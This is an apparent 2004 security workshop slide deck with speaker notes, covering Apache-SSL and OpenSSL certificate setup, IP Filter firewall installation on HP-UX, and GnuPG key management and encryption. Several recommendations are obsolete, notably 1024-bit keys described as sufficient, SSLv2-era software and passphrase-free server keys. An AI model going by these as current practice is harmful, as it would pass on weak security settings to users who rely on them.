A program for managing keys and certificatesopenssl action ...

Often openssl action-in. . . -out . . .

Notes. . .

OpenSSL is a cryptography toolkit implementing the Secure Sock-ets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) net-

work protocols and related cryptography standards required bythem.

The openssl program is a command line tool for using the variouscryptography functions of OpenSSLs crypto library from the shell.It can be used for

Creation of RSA, DH and DSA key parameters

Creation of X.509 certificates, CSRs and CRLs

Calculation of Message Digests

Encryption and Decryption with Ciphers

SSL/TLS Client and Server Tests

Handling of S/MIME signed or encrypted mail

lv


56/83

Internet Security

7.4 Terms

Certificate Request A document giving who I am infor-mation

Key Some big semi-prime numbers in a file

Certificate A certificate request signed by someone(maybe yourself)

Notes. . .

lvi


57/83

Internet Security

7.5 Getting / Compiling Apache-SSL

Distributed as patches to Apache

Requires OpenSSL to be already installed

Notes. . .

1. Download OpenSSL-0.9.6 from http://www.openssl.org/

2. Download apache-1.3.19 from http://www.apache.org/

3. Download apache-1.3.19+ssl1.42 from http://www.apache-ssl.org/

4. Download GNU patch from http://hpux.cs.utah.edu/hppd/hpux/Sysadmin/paInstall it. Set your PATH so that it gets found before /usr/bin/patch

5. gunzip -c apache-1.3.19.tar.gz tar -xvf -

6. cd apache-1.3.19.tar.gz

7. gunzip -c ../apache-1.3.19+ssl-1.42.tar.gz tar -xvf -

8. ./FixPatch /opt/openssl

9. ./configure prefix=/opt/apache

10. make

11. make install

12. cd src

13. vi MakefileFor some reason, the configuration is a little bit wonky. SSL APPisnt set correctly. Set it to be /opt/openssl/lib/openssl

14. ln -s /opt/apache/conf/httpsd.conf /opt/apache/conf/httpd.conf

lvii


58/83

Internet Security

7.6 Configuring Apache+SSL

Get some randomness. Shake well.

openssl req -new > mycompany.csr

openssl rsa -in privkey.pem -outmycompany.key

openssl x509 -in mycompany.csr -outmycompany.cert -req -signkey mycompany.key

-days 365

Notes. . .

1. PATH=/opt/openssl/lib

2. Set up the random seed file. Replace Garbage characterswith some random junk. echo "Garbagecharacters" > $HOME/.rnd

3. Create the SSL key and request:openssl req -new > mycompany.csr

You will destroy the passphrase in the next step; answer thequestions appropriately. For common name, put in the nameof your server, e.g. www.myco.com

4. Step two - remove the passphrase from the key (optional):

openssl rsa -in privkey.pem -out mycompany.key

5. Convert the request into signed certificate:

openssl x509 -in mycompany.csr -out mycompany.cert -req

-signkey mycompany.key -days 365

6. mkdir /opt/apache/certificates

7. mv *.cert *.key /opt/apache/certificates

8. Edit httpsd.conf, and add uncomment the lines for SSLCer-tificateFile (the.certfile) and SSLCertificateKeyFile (the.keyfile):

lviii


59/83

Internet Security

9. Try it out! Run /opt/apache/bin/httpsd

10. Visit https://your-server/

lix


60/83

Internet Security

7.7 Why does the browser still complain?

Your.csrfile is just what you put in?

Why should anyone believe you?

So get your.csrsigned by someone else

Notes. . .

You send the .csr file to a certificate authority. (This could beyour neighbour if you wish, but Thwaite or Verisign might be moretrustworthy). They will then vouch for the accuracy of the entriesin the .csr file. And if the browser is configured to trust certifi-cates signed by that certificate authority, then the browser can beconfident of your.csrfile.

Assuming the certificate authority is using OpenSSL (which theyprobably are), and assuming they have got their key in my.CA.keyand their certificate in my.CA.cert, they would take your.csrandrun:

openssl x509 -req -in mycompany.csr -out mycompany.cert -signkey my.CA.key -CA my.CA.cert -CAkey my.CA.key -CAcreateserial-days 365

(Bold font is just for readability.)

This produces a file called mycompany.cert, which they will sendback to you. You can now replace the old self-signed mycompany.certthat you had before with this one signed by a reputable authority.

The authoritys .cert

file is public knowledge (as are all .cert

files, so grab a copy of that as well, and put the following lines inhttpsd.conf:

SSLCACertificateFile /path/to/certs/my.CA.cert

SSLVerifyClient 2

lx


61/83

Internet Security

7.8 Other things to know

Session cache

openssl manpages

Notes. . .

The session cacheoption was set in the httpsd.conf.

SSL uses a session key to secure each connection. When the con-nection starts, certificates are checked and a new session key isagreed between the client and server (note that because of the joysof public key encryption, this new key is only known to the clientand server). This is a time-consuming process, so Apache-SSL andthe client can conspire to improve the situation by reusing ses-sion keys. Unfortunately, since Apache uses a multiprocess exe-cution model, theres no guarantee that the next connection fromthe client will use the same instance of the server. In fact, it israther unlikely. Thus, it is necessary to store session information

in a cache that is accessible to all the instances of Apache-SSL.This is the function of the gcache program. It is controlled bythe SSLCacheServerPath, SSLCacheServerPort, and SSLSession-CacheTimeout directives.

The OpenSSL man pages are structured strangely. If you wantto know about what you can put after beginning the commandopenssl x509, look in the x509man page. You will probably needto configure your MANPATH or /etc/man.confto find this.

lxi


62/83

Chapter 8

Firewalls

lxii


63/83

Internet Security

8.1 HP-UX Instructions

Its a little complicated. . .

Notes. . .

You will need HP-UX 11 with patch bundle December 1998, 99OP,or 11.ACE.

Before proceeding, if you already have a version of IP Filter installedon your system, remove it with kminstall -d ipf and then useswremove to remove the installed base.

The first step is to install PHNE 22397. (Additional note: whichhas been obsoleted. Most recently patched systems will havethis patch or its successor.)

After this, you MUST reboot so that the new kernel is in place whenyou proceed to install later components.

Next, you need to download and install pfil. This is a STREAMS

interface for packet filtering that removes the need for packet fil-tering code to be written as a STREAMS module. This can be down-loaded from ftp://coombs.anu.edu.au/pub/net/ip-filter/pfil-1.11.tar.gz .

Unpack this and type make in the pfil directory. Once compelte,type make install to kick off the installation.

Having got this far, you now need to download the latest IP Filterpackage and compile/install that. The source code for IP Filter can

be obtained from: http://coombs.anu.edu.au/avalon/ip fil4.0alpha18.tar.gz.This should be unpacked into the same directory as pfil is. The

directory layout will look like this:

/directory/ip fil4.0alpha18

/directory/pfil

(Additional note: that it, you will need to make a symbolic link to

pfil-1.11).

lxiii


64/83

Internet Security

This complete, do a make hpux in the ip fil4.0alpha18 directory,

followed by a make install-hpux. You will need to reboot for it tobecome active.

(Additional note: if you get an error unable to include ip trafcon.h

inparse.c, simply delete the offending line.)

(Additional note: you will be asked at the end to runswinstall -s

/var/spool/sw/IPF.v4.0a.depot -x reinstall=true IPF-RUN.

I have no idea whether this is necessary or not. I did it.)

lxiv


65/83

Internet Security

8.2 How to use it

Examples are in /opt/ipf/examples

Man pages are in /opt/ipf/man

Configuration files in /etc/opt/ipf

Notes. . .

Note that it does not start up by default, since there are no sym-links into the run-script directories.

Quick start guide:

1. Put some lines into /etc/opt/ipf/ipf.confsuch as

block in on lan0 from any to any port = 23

block in on lan0 proto icmp from any to any

2. Run /sbin/init.d/ipfboot start

3. Explore the examples in sequential order

4. Make changes to your config files. Check that all works cor-rectly with /sbin/init.d/ipfboot stop ; /sbin/init.d/ipfbootstart

(There are better ways, but this will always work!)

lxv


66/83

Internet Security

8.3 Exercise

1. Make your system un-ping-able

2. Stop your neighbour from reaching you with telnetorssh

3. If your system has two interfaces, enable masquerad-ing

Notes. . .

To do these, you will need ipf installed and working.

lxvi


67/83

Chapter 9

Pretty Good Privacy

lxvii


68/83

Internet Security

9.1 What is PGP?

The most widely used email encryption software

Digital signature technology

A way of keeping a document secret

A web of user identifications

Notes. . .

lxviii


69/83

Internet Security

9.2 Where do I get it?

Network Associates (commercial version)

www.PGPi.org (international freeware)

www.gnupg.org(GNU Public License)

Notes. . .

We will be talking about the GNU Privacy Guard version as it isactively maintained, and freely available. It is available for MS-

Windows and most versions of Unix.

lxix


70/83

Internet Security

9.3 Very first

Create a key

gpg --gen-key

Notes. . .

The first time you run it, it will fail, but it will create a .gnupg

directory in your home directory.When you run it again, you wil be asked several questions:

What sort of key? (sign only, sign and encrypt). If you arelikely to have your encryption key subpoenaed (e.g. to un-encrypt documents for a court case or police investigation),

you might want to separate out your signature and encryp-tion keys.

Normally you can use the defaults.

What encryption key size to use? (768, 1024, 2048 Youcan choose others.) The default, 1024, should be sufficient foralmost any purpose. If you are wanting to archive somethingfor a few decades (until the advent of quantum computing),

you might want to go higher.

How long will it be valid for? Up to you. You can revoke akey later, so theres no particular reason not to have a goodcouple of years of life in a key.

Your identity name, email address, comment. If you areknown regularly by a nickname, the comment is a good placeto store it. Leaving the comment blank is common.

A passphrase.

It will then generate a random private and public key pair. Someversions of Unix support a /dev/random device which it will use otherwise it will just use a pseudo-random number generator.

lxx


71/83

Internet Security

To create good random numbers for the key parameters, GnuPG

needs to gather enough noise (entropy) from your system. If yousee no progress during key generation you should start some otheractivities such as mouse moves or hitting on the CTRL and SHIFTkeys.

Generate a key ONLY on a machine where you have direct physicalaccess dont do it over the network or on a machine used also byothers - especially if you have no access to the root account.

When you are asked for a passphrase use a good one which youcan easy remember. Dont make the passphrase too long because

you have to type it for every decryption or signing; but, AND THISIS VERY IMPORTANT use a good one that is not easily to guess

because the security of the whole system relies on your secret keyand the passphrase that protects it when someone gains access to

your secret keyring. A good way to select a passphrase is to figureout a short nonsense sentence which makes some sense for youand modify it by inserting extra spaces, non-letters and changingthe case of some characters - this is really easy to remember espe-cially if you associate some pictures with it.

lxxi


72/83

Internet Security

9.4 The second thing to do

gpg gen-revoke your user id

Notes. . .

By the way, whenevergpg asks for a user id, it can be expressed asan email, ordinary name, 8-hex-digit key or a minimal match forany of these. You can see them with gpg --list-keys.

You should create a revocation certificate in case someone getsknowledge of your secret key or you forgot your passphrase

gpg --gen-revoke your user id | lp

Run this command and store the revocation certificate away. Theoutput is always ASCII armored, so that you can print it and (hope-fully never) re-create it if your electronic media fails.

Keep in mind that anyone getting hold of this can make a nuisanceof themselves by revoking your certificate for you.

lxxii


73/83

Internet Security

9.5 Sharing with others

Theres not much point unless you can share with oth-ers...

gpg --export --armor > file.yourname

gpg --import file.someone-else

Notes. . .

Now to exchange your public key put it into a file somewhere: gpg--export --armor > file.yourname

And the other person can then import that to their keyring withgpg --import file.someone-else

lxxiii


74/83

Internet Security

9.6 Exercise

To start

Notes. . .

1. Install GnuPG

2. Create your public-private keypair

3. Export your public key and put it somewhere for everyone else

4. Collect all the files that everyone else in the class has gener-ated, and import them one by one.

lxxiv


75/83

Internet Security

9.7 Verifying things

gpg --fingerprint

Notes. . .

Because anyone can claim that a public key belongs to her wemust have some way to check that a public key really belongs tothe owner. This can be achieved by comparing the key during a

phone call. Sure, it is not very easy to compare a binary file byreading the complete hex dump of the file - GnuPG (and nearlyevery other program used for management of cryptographic keys)provides other solutions.

gpg --fingerprint username

prints the so called fingerprint of the given username which is asequence of hex bytes (which you may have noticed in mail sigsor on business cards) that uniquely identifies the public key - dif-ferent keys will always have different fingerprints. It is easy to

compare fingerprints by phone and I suggest that you print yourfingerprint on the back of your business card. To see the finger-prints of the secondary keys, you can give the command twice; butthis is normally not needed.

Heres mine by the way, you can see it on the bottom of my busi-ness card.

[email protected]

46D9 518A 5B68 5665 42B3

FAE2 E54E CE5A 5A39 51C7

lxxv


76/83

Internet Security

9.8 Assert your confidence

Just importing a key doesnt make it right.gpg --edit-key their user id

Notes. . .

If you are confident that a public key does belong to a particularperson, you will need to tell gpg that it is safe and reliable to use

that key for that person.Run gpg --edit-key [email protected] (or any other userhandle you have for them. You will end up interacting with a funnymenu. Locally sign their key by typing lsign. When this is done,savethe result.

lxxvi


77/83

Internet Security

9.9 Actually using it

gpg armor encrypt sign recipienttheir user id file-to-encrypt

gpg decryptfile

Notes. . .

The --armor option keeps things as ASCII text. There will be afile created called file-to-encrypt.asc. It should look something likethis:

-----BEGIN PGP MESSAGE-----

Version: GnuPG v1.0.5 (OpenBSD)

Comment: For info see http://www.gnupg.org

hQIOAwWI0D/ykGGjEAf9ELITEBsNGdWLF+XHfmwcAS1KYbrgTb4CQ6Ou19WrfPc1

nn+OyeKKEC1vi5Ta3COZOAz/PYz3kzgW9rbA3+B0kSGoFdjWeHhCyOpM/qk5o/xj

uABFkFc1BZ8IjZu5E0gmK0AzIFHcb5MQ5wcCoWUeBKLfMpU9ZWgwSo7sR46oI914

oqp/8QtrET0mLaFIwV1XMR+LKakZ9FGiWm+1TYJsXFugI5m6pirTn3hbaT2VLoWs

tsOXUR/fcV5rSpt7ah6Rpxvg65jsauEYFHquWnyd1mkY8xdXNGonAchxTzjqYKvw

4Xk0mpzzbaKC71cLoXgg/cc0L7C+soDofKVuYbUX4wf+O9kmzHF8RMK9lqucMBSK

FseT/E/8LjHZxt9LUB6cSS9a38N+AEk6AX6WStKIIWMjXlnBT7zyHwW5Lxk1/E0w

e9Gqh+v1stUrf9xskkkgKwS5+Dc0k95OvuYCZbHrOLkZtzsSpajumHVqBn3HavcZ

OVeFQHqQEfAGiPQO3I2zgO4cuVsalVwoNm+eIeoHl+1a8Lv3eqdCqQwiDClJ6YZl

bz+gpmqZY4fmQdc0+SIK5rmxqZRU83nqdf6LYhFJRiS/Xs1Y9B2TQwwQ/Y04dhXB

C0uWp+1A1WEC6xTzADOaehwlczuQLjY6AYrS0EkrvRqQ5ScER5JkFxKwY3lGSllr

PdKZAX1iPRqreT0JgxPddeSfQFB2YEW/2jwU0Mr5RXp4VT9FSL6jrtTngMhouOSS

OCKp1d9ueu2L4uqocD4Lc9PVzJe27Xq77pdLfEyNvgVmY5v9LWBB48iNHnPxxzYv

UFEbeWC+G6q7m0UmZJVttUWamzDea6/sWXLFgrEaaGisTyDvvTN12guJhbsQgDrj

81zcdQxbT3O5q9Ff

=j7u3

-----END PGP MESSAGE-----

lxxvii


78/83

Internet Security

9.10 Exercise

To see the effects of locally signed addresses.

Notes. . .

1. Pick a user on your keychain. Write a short little note to them,and encrypt it using their public key. You will be asked for

your passphrase, and also be warned that there is no path oftrust to them.

2. Give the resultant.ascfile to them. (Perhaps via email).

3. Your partner will have given you a.ascfile. Decrypt it.

4. Now go and talk to them and confirm that when youdo gpg--fingerprint of their key that it gives the same fingerprintthattheyhave for their key.

5. If there is some doubt, get them to give you a new export of

their public key. If youre happy, locally sign their key (gpg--edit-key, then lsign).

6. Now send them another message. You wont be asked aboutthe path of trust this time.

lxxviii


79/83

Internet Security

9.11 Other things

gpg --export-secret-keys > my-private-key

gpg --import private-key

Notes. . .

If you are moving between identical versions of PGP software, orones that are otherwise compatible, you could just copy your.gnupgdirectory. But if you want to keep the same key on another plat-form, or using different software, you may need to export them.

Obviously, keep the file very carefully!

lxxix


80/83

Internet Security

9.12 Too painful!

There are front-ends to email systems that use GPG.

XFMail

Kmail

mutt

. . .

Notes. . .

And an interesting little project is www.winpt.org, which is a GPGentry into the MS-Windows taskbar.

lxxx


81/83

Internet Security

9.13 What else?

Introducers

Notes. . .

From the GPG documentation

If you dont know the owner of the public key you are in trouble.Suppose however that friend of yours knows someone who knowssomeone who has met the owner of the public key at some com-puter conference. Suppose that all the people between you and thepublic key holder may now act as introducers to you. Introducerssigning keys thereby certify that they know the owner of the keysthey sign. If you then trust all the introducers to have correctlysigned other keys, you can be be sure that the other key really

belongs to the one who claims to own it..

There are 2 steps to validate a key:

1. First check that there is a complete chain of signed keys fromthe public key you want to use and your key and verify eachsignature.

2. Make sure that you have full trust in the certificates of all theintroduces between the public key holder and you.

Step 2 is the more complicated part because there is no easy way

for a computer to decide who is trustworthy and who is not. GnuPGleaves this decision to you and will ask you for a trust value (herealso referenced as the owner-trust of a key) for every key needed tocheck the chain of certificates. You may choose from:

I dont know - then it is not possible to use any of the chainsof certificates, in which this key is used as an introducer, to

validate the target key. Use this if you dont know the intro-ducer.

lxxxi


82/83


83/83

Internet Security

Normally you want to sign only one user ID because GnuPG uses

only one and this keeps the public key certificate small. Becausesuch key signatures are very important you should make sure thatthe signatories of your key sign a user ID which is very likely tostay for a long time - choose one with an email address you havefull control of or do not enter an email address at all. In futureGnuPG will have a way to tell which user ID is the one with anemail address you prefer - because you have no signatures on thisemail address it is easy to change this address. Remember, yoursignatories sign your public key (the primary one) together with oneof your user IDs - so it is not possible to change the user ID later

without voiding all the signatures.

Tip: If you hear about a key signing party on a computer conferencejoin it because this is a very convenient way to get your key certified(But remember that signatures have nothing to to with the trust

you assign to a key).

ifost security workshop (2004)

Documents